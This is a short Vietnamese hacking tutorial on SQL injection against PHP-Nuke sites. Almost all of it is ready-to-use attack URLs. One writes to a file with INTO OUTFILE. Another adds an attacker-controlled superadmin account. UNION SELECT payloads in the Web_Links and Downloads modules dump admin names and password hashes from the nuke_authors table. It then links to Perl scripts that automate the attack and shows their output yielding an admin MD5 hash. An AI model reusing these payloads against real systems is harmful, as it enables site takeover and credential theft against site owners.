Trước hết chúng ta đi qua một số lỗi ngớ ngẩn của SQL injection
admin.php :
www.site.com/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt
Add một User vào thành Admin :
www.site.com/admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid=$nick&add_email=hacker@hacker.com&add_pwd=$pass&admin=$hash";
Modules.php?name=Web_Links
www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20--
Chú ý là 2 cái link đó là khác nhau đó :D . Đối với spaiz-nuke thì ngược lại một chút "nuke_authors" thành "spnuke_authors"
Modules?name=Downloads
www.site.com/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
Bây giờ cho nó chạy tự động.
Đối với lỗi admin.php : Download tại đây : http://www.security.com.vn/tool/adminphpnuke.pl
Đối với lỗi Modules.php : Download tại đây : http://www.security.com.vn/tool/modulesphpnuke.pl
Cách sử dụng : C:\>modulesphpnuke.pl server /folder/ aid : trong đó : server là Ip hoặc domain , folder là thư mục chứa phpnuke ,aid là Admin
Ví dụ : C:\modulesphpnuke.pl http://www.security.com.vn/ phpnuke admin
[~] Dang cho ket noi...
[+] da ket noi
[~] dang gui du lieu...
[+] thanh cong
[~] cho tra loi...
[+] USER: admin
[+] MD5 HASH: 5f4dcc3b5aa765d61d8327deb882cf99 <== có rồi nè .
